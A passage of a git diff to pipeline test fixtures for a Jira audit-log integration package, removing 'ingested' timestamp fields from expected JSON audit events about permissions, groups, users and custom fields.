end\"},{\"key\":\"Type\",\"i18nKey\":\"common.words.type\",\"to\":\"Target end\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -5310,7 +5235,6 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-24T00:58:01.924772414Z", "original": "{\"timestamp\":\"2021-11-22T00:06:59.224Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.fields\",\"category\":\"fields\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"action\":\"Custom field created\"},\"affectedObjects\":[{\"name\":\"Target start\",\"type\":\"CUSTOM_FIELD\",\"uri\":\"http://jira.internal:8088/secure/admin/ConfigureCustomField!default.jspa?customFieldId=10102\",\"id\":\"customfield_10102\"}],\"changedValues\":[{\"key\":\"Description\",\"i18nKey\":\"common.words.description\",\"to\":\"The targeted start date. This custom field is created and required by Portfolio for Jira.\"},{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"Target start\"},{\"key\":\"Type\",\"i18nKey\":\"common.words.type\",\"to\":\"Target start\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -5384,7 +5308,6 @@ }, "event": { "action": "jira.auditing.customfield.updated", - "ingested": "2021-12-24T00:58:01.924773288Z", "original": "{\"timestamp\":\"2021-11-22T00:06:58.990Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.fields\",\"category\":\"fields\",\"actionI18nKey\":\"jira.auditing.customfield.updated\",\"action\":\"Custom field updated\"},\"affectedObjects\":[{\"name\":\"Parent Link\",\"type\":\"CUSTOM_FIELD\",\"uri\":\"http://jira.internal:8088/secure/admin/ConfigureCustomField!default.jspa?customFieldId=10101\",\"id\":\"customfield_10101\"}],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -5441,7 +5364,6 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-24T00:58:01.924774160Z", "original": "{\"timestamp\":\"2021-11-22T00:06:58.974Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.fields\",\"category\":\"fields\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"action\":\"Custom field created\"},\"affectedObjects\":[{\"name\":\"Parent Link\",\"type\":\"CUSTOM_FIELD\",\"uri\":\"http://jira.internal:8088/secure/admin/ConfigureCustomField!default.jspa?customFieldId=10101\",\"id\":\"customfield_10101\"}],\"changedValues\":[{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"Parent Link\"},{\"key\":\"Type\",\"i18nKey\":\"common.words.type\",\"to\":\"Parent Link\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -5510,7 +5432,6 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-24T00:58:01.924775024Z", "original": "{\"timestamp\":\"2021-11-22T00:06:58.318Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.fields\",\"category\":\"fields\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"action\":\"Custom field created\"},\"affectedObjects\":[{\"name\":\"Team\",\"type\":\"CUSTOM_FIELD\",\"uri\":\"http://jira.internal:8088/secure/admin/ConfigureCustomField!default.jspa?customFieldId=10100\",\"id\":\"customfield_10100\"}],\"changedValues\":[{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"Team\"},{\"key\":\"Type\",\"i18nKey\":\"common.words.type\",\"to\":\"Team\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -5579,7 +5500,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:01.924775911Z", "original": "{\"timestamp\":\"2021-11-22T00:06:57.162Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default Permission Scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=0\",\"id\":\"0\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Manage Sprints\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Project Role\"},{\"key\":\"Value\",\"i18nKey\":\"admin.common.words.value\",\"from\":\"\",\"to\":\"Administrators\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -5653,7 +5573,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:01.924776778Z", "original": "{\"timestamp\":\"2021-11-22T00:06:57.158Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default Permission Scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=0\",\"id\":\"0\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"Manage Sprints\",\"to\":\"\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"Project Role\",\"to\":\"\"},{\"key\":\"Value\",\"i18nKey\":\"admin.common.words.value\",\"from\":\"Administrators\",\"to\":\"\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -5727,7 +5646,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:01.924777706Z", "original": "{\"timestamp\":\"2021-11-22T00:06:57.138Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default Permission Scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=0\",\"id\":\"0\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Manage Sprints\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Project Role\"},{\"key\":\"Value\",\"i18nKey\":\"admin.common.words.value\",\"from\":\"\",\"to\":\"Administrators\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -5802,7 +5720,6 @@ }, "event": { "action": "jira.auditing.user.added.to.group", - "ingested": "2021-12-24T00:58:01.924778569Z", "original": "{\"timestamp\":\"2021-11-22T00:06:49.756Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.groupmanagement\",\"category\":\"group management\",\"actionI18nKey\":\"jira.auditing.user.added.to.group\",\"action\":\"User added to group\"},\"affectedObjects\":[{\"name\":\"jira-software-users\",\"type\":\"GROUP\",\"uri\":\"http://jira.internal:8088/secure/ViewGroup.jspa?name=jira-software-users\"},{\"name\":\"test.user\",\"type\":\"USER\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"id\":\"JIRAUSER10000\"}],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "group", @@ -5877,7 +5794,6 @@ }, "event": { "action": "jira.auditing.global.permission.added", - "ingested": "2021-12-24T00:58:01.924779448Z", "original": "{\"timestamp\":\"2021-11-22T00:06:49.754Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.global.permission.added\",\"action\":\"Global permission added\"},\"affectedObjects\":[{\"name\":\"Global Permissions\",\"type\":\"PERMISSIONS\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"admin.common.words.group\",\"from\":\"\",\"to\":\"jira-administrators\"},{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Manage Group Filter Subscriptions\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -5951,7 +5867,6 @@ }, "event": { "action": "jira.auditing.global.permission.added", - "ingested": "2021-12-24T00:58:01.924781682Z", "original": "{\"timestamp\":\"2021-11-22T00:06:49.752Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.global.permission.added\",\"action\":\"Global permission added\"},\"affectedObjects\":[{\"name\":\"Global Permissions\",\"type\":\"PERMISSIONS\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"admin.common.words.group\",\"from\":\"\",\"to\":\"jira-administrators\"},{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Create Shared Objects\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -6025,7 +5940,6 @@ }, "event": { "action": "jira.auditing.global.permission.added", - "ingested": "2021-12-24T00:58:01.924782586Z", "original": "{\"timestamp\":\"2021-11-22T00:06:49.751Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.global.permission.added\",\"action\":\"Global permission added\"},\"affectedObjects\":[{\"name\":\"Global Permissions\",\"type\":\"PERMISSIONS\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"admin.common.words.group\",\"from\":\"\",\"to\":\"jira-administrators\"},{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Browse Users\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -6099,7 +6013,6 @@ }, "event": { "action": "jira.auditing.global.permission.added", - "ingested": "2021-12-24T00:58:01.924783456Z", "original": "{\"timestamp\":\"2021-11-22T00:06:49.750Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.global.permission.added\",\"action\":\"Global permission added\"},\"affectedObjects\":[{\"name\":\"Global Permissions\",\"type\":\"PERMISSIONS\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"admin.common.words.group\",\"from\":\"\",\"to\":\"jira-administrators\"},{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Bulk Change\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -6174,7 +6087,6 @@ }, "event": { "action": "jira.auditing.user.added.to.group", - "ingested": "2021-12-24T00:58:01.924784404Z", "original": "{\"timestamp\":\"2021-11-22T00:06:49.734Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.groupmanagement\",\"category\":\"group management\",\"actionI18nKey\":\"jira.auditing.user.added.to.group\",\"action\":\"User added to group\"},\"affectedObjects\":[{\"name\":\"jira-administrators\",\"type\":\"GROUP\",\"uri\":\"http://jira.internal:8088/secure/ViewGroup.jspa?name=jira-administrators\"},{\"name\":\"test.user\",\"type\":\"USER\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"id\":\"JIRAUSER10000\"}],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "group", @@ -6250,7 +6162,6 @@ }, "event": { "action": "jira.auditing.user.created", - "ingested": "2021-12-24T00:58:01.924785265Z", "original": "{\"timestamp\":\"2021-11-22T00:06:49.600Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.usermanagement\",\"category\":\"user management\",\"actionI18nKey\":\"jira.auditing.user.created\",\"action\":\"User created\"},\"affectedObjects\":[{\"name\":\"test.user\",\"type\":\"USER\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"id\":\"JIRAUSER10000\"}],\"changedValues\":[{\"key\":\"Active / Inactive\",\"i18nKey\":\"admin.common.phrases.active.inactive\",\"to\":\"Active\"},{\"key\":\"Email\",\"i18nKey\":\"common.words.email\",\"to\":\"test.user@example.com\"},{\"key\":\"Full name\",\"i18nKey\":\"common.words.fullname\",\"to\":\"Alex\"},{\"key\":\"Username\",\"i18nKey\":\"common.words.username\",\"to\":\"test.user\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "user", @@ -6344,7 +6255,6 @@ }, "event": { "action": "jira.auditing.system.license.added", - "ingested": "2021-12-24T00:58:01.924786175Z", "original": "{\"timestamp\":\"2021-11-22T00:05:08.596Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.system\",\"category\":\"system\",\"actionI18nKey\":\"jira.auditing.system.license.added\",\"action\":\"New license added\"},\"affectedObjects\":[{\"name\":\"SEN-L17782970\",\"type\":\"LICENSE\",\"id\":\"0\"}],\"changedValues\":[{\"key\":\"Date Purchased\",\"i18nKey\":\"admin.license.date.purchased\",\"to\":\"21/Nov/21\"},{\"key\":\"License Type\",\"i18nKey\":\"admin.license.type\",\"to\":\"Jira Software (Data Center): Evaluation\"},{\"key\":\"Organization\",\"i18nKey\":\"admin.license.organisation\",\"to\":\"myself\"},{\"key\":\"Server ID\",\"i18nKey\":\"admin.server.id\",\"to\":\"BGD5-PMSH-258I-VTTW\"},{\"key\":\"Support Entitlement Number (SEN)\",\"i18nKey\":\"admin.license.sen\",\"to\":\"SEN-L17782970\"},{\"key\":\"User Limit\",\"i18nKey\":\"admin.license.user.limit\",\"to\":\"Unlimited\"},{\"key\":\"jira-software\",\"i18nKey\":\"jira-software\",\"to\":\"-1\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -6437,7 +6347,6 @@ }, "event": { "action": "jira.auditing.global.permission.added", - "ingested": "2021-12-24T00:58:01.924787055Z", "original": "{\"timestamp\":\"2021-11-22T00:05:08.584Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.global.permission.added\",\"action\":\"Global permission added\"},\"affectedObjects\":[{\"name\":\"Global Permissions\",\"type\":\"PERMISSIONS\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"admin.common.words.group\",\"from\":\"\",\"to\":\"jira-software-users\"},{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Manage Group Filter Subscriptions\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -6511,7 +6420,6 @@ }, "event": { "action": "jira.auditing.global.permission.added", - "ingested": "2021-12-24T00:58:01.924787930Z", "original": "{\"timestamp\":\"2021-11-22T00:05:08.583Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.global.permission.added\",\"action\":\"Global permission added\"},\"affectedObjects\":[{\"name\":\"Global Permissions\",\"type\":\"PERMISSIONS\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"admin.common.words.group\",\"from\":\"\",\"to\":\"jira-software-users\"},{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Create Shared Objects\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -6585,7 +6493,6 @@ }, "event": { "action": "jira.auditing.global.permission.added", - "ingested": "2021-12-24T00:58:01.924788861Z", "original": "{\"timestamp\":\"2021-11-22T00:05:08.581Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.global.permission.added\",\"action\":\"Global permission added\"},\"affectedObjects\":[{\"name\":\"Global Permissions\",\"type\":\"PERMISSIONS\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"admin.common.words.group\",\"from\":\"\",\"to\":\"jira-software-users\"},{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Bulk Change\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -6659,7 +6566,6 @@ }, "event": { "action": "jira.auditing.global.permission.added", - "ingested": "2021-12-24T00:58:01.924789753Z", "original": "{\"timestamp\":\"2021-11-22T00:05:08.579Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.global.permission.added\",\"action\":\"Global permission added\"},\"affectedObjects\":[{\"name\":\"Global Permissions\",\"type\":\"PERMISSIONS\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"admin.common.words.group\",\"from\":\"\",\"to\":\"jira-software-users\"},{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Browse Users\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -6733,7 +6639,6 @@ }, "event": { "action": "jira.auditing.group.created", - "ingested": "2021-12-24T00:58:01.924790611Z", "original": "{\"timestamp\":\"2021-11-22T00:05:08.514Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.groupmanagement\",\"category\":\"group management\",\"actionI18nKey\":\"jira.auditing.group.created\",\"action\":\"Group created\"},\"affectedObjects\":[{\"name\":\"jira-software-users\",\"type\":\"GROUP\",\"uri\":\"http://jira.internal:8088/secure/ViewGroup.jspa?name=jira-software-users\"}],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "group", @@ -6799,7 +6704,6 @@ }, "event": { "action": "jira.auditing.user.renamed", - "ingested": "2021-12-24T00:58:01.924791474Z", "original": "{\"timestamp\":\"2021-11-28T18:18:26.076Z\",\"author\":{\"name\":\"admin.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=admin.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.usermanagement\",\"category\":\"user management\",\"actionI18nKey\":\"jira.auditing.user.renamed\",\"action\":\"User renamed\"},\"affectedObjects\":[{\"name\":\"admin.user1\",\"type\":\"USER\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=admin.user1\",\"id\":\"JIRAUSER10000\"}],\"changedValues\":[{\"key\":\"Username\",\"i18nKey\":\"common.words.username\",\"from\":\"admin.user\",\"to\":\"admin.user1\"}],\"source\":\"10.100.100.2\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -6870,7 +6774,6 @@ }, "event": { "action": "jira.auditing.user.updated", - "ingested": "2021-12-24T00:58:01.924792341Z", "original": "{\"timestamp\":\"2021-11-28T18:23:20.278Z\",\"author\":{\"name\":\"admin.user1\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=admin.user1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.usermanagement\",\"category\":\"user management\",\"actionI18nKey\":\"jira.auditing.user.updated\",\"action\":\"User updated\"},\"affectedObjects\":[{\"name\":\"admin.user1\",\"type\":\"USER\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=admin.user1\",\"id\":\"JIRAUSER10000\"}],\"changedValues\":[{\"key\":\"Email\",\"i18nKey\":\"common.words.email\",\"from\":\"admin@example.com\",\"to\":\"admin1@example.com\"}],\"source\":\"10.100.100.2\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "user", @@ -6949,7 +6852,6 @@ }, "event": { "action": "jira.auditing.user.updated", - "ingested": "2021-12-24T00:58:01.924793277Z", "original": "{\"timestamp\":\"2021-11-28T18:23:13.741Z\",\"author\":{\"name\":\"admin.user1\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=admin.user1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.usermanagement\",\"category\":\"user management\",\"actionI18nKey\":\"jira.auditing.user.updated\",\"action\":\"User updated\"},\"affectedObjects\":[{\"name\":\"admin.user1\",\"type\":\"USER\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=admin.user1\",\"id\":\"JIRAUSER10000\"}],\"changedValues\":[{\"key\":\"Full name\",\"i18nKey\":\"common.words.fullname\",\"from\":\"Admin User\",\"to\":\"Admin User1\"}],\"source\":\"10.100.100.2\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "user", diff --git a/packages/atlassian_jira/data_stream/audit/_dev/test/pipeline/test-audit-files.log-expected.json b/packages/atlassian_jira/data_stream/audit/_dev/test/pipeline/test-audit-files.log-expected.json index c517829e254..9e89e02c7ef 100644 --- a/packages/atlassian_jira/data_stream/audit/_dev/test/pipeline/test-audit-files.log-expected.json +++ b/packages/atlassian_jira/data_stream/audit/_dev/test/pipeline/test-audit-files.log-expected.json @@ -25,7 +25,6 @@ }, "event": { "action": "jira.auditing.group.created", - "ingested": "2021-12-24T00:58:20.169927033Z", "original": "{\"affectedObjects\":[{\"name\":\"jira-software-users\",\"type\":\"GROUP\"}],\"auditType\":{\"action\":\"Group created\",\"actionI18nKey\":\"jira.auditing.group.created\",\"area\":\"USER_MANAGEMENT\",\"category\":\"group management\",\"categoryI18nKey\":\"jira.auditing.category.groupmanagement\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539508,\"nano\":514000000},\"version\":\"1.0\"}", "type": [ "group", @@ -91,7 +90,6 @@ }, "event": { "action": "jira.auditing.global.permission.added", - "ingested": "2021-12-24T00:58:20.169930493Z", "original": "{\"affectedObjects\":[{\"name\":\"Global Permissions\",\"type\":\"PERMISSIONS\"}],\"auditType\":{\"action\":\"Global permission added\",\"actionI18nKey\":\"jira.auditing.global.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Browse Users\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.group\",\"key\":\"Group\",\"to\":\"jira-software-users\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539508,\"nano\":579000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -167,7 +165,6 @@ }, "event": { "action": "jira.auditing.global.permission.added", - "ingested": "2021-12-24T00:58:20.169931384Z", "original": "{\"affectedObjects\":[{\"name\":\"Global Permissions\",\"type\":\"PERMISSIONS\"}],\"auditType\":{\"action\":\"Global permission added\",\"actionI18nKey\":\"jira.auditing.global.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Bulk Change\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.group\",\"key\":\"Group\",\"to\":\"jira-software-users\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539508,\"nano\":581000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -243,7 +240,6 @@ }, "event": { "action": "jira.auditing.global.permission.added", - "ingested": "2021-12-24T00:58:20.169932188Z", "original": "{\"affectedObjects\":[{\"name\":\"Global Permissions\",\"type\":\"PERMISSIONS\"}],\"auditType\":{\"action\":\"Global permission added\",\"actionI18nKey\":\"jira.auditing.global.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Create Shared Objects\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.group\",\"key\":\"Group\",\"to\":\"jira-software-users\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539508,\"nano\":583000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -319,7 +315,6 @@ }, "event": { "action": "jira.auditing.global.permission.added", - "ingested": "2021-12-24T00:58:20.169932943Z", "original": "{\"affectedObjects\":[{\"name\":\"Global Permissions\",\"type\":\"PERMISSIONS\"}],\"auditType\":{\"action\":\"Global permission added\",\"actionI18nKey\":\"jira.auditing.global.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Manage Group Filter Subscriptions\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.group\",\"key\":\"Group\",\"to\":\"jira-software-users\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539508,\"nano\":584000000},\"version\":\"1.0\"}", 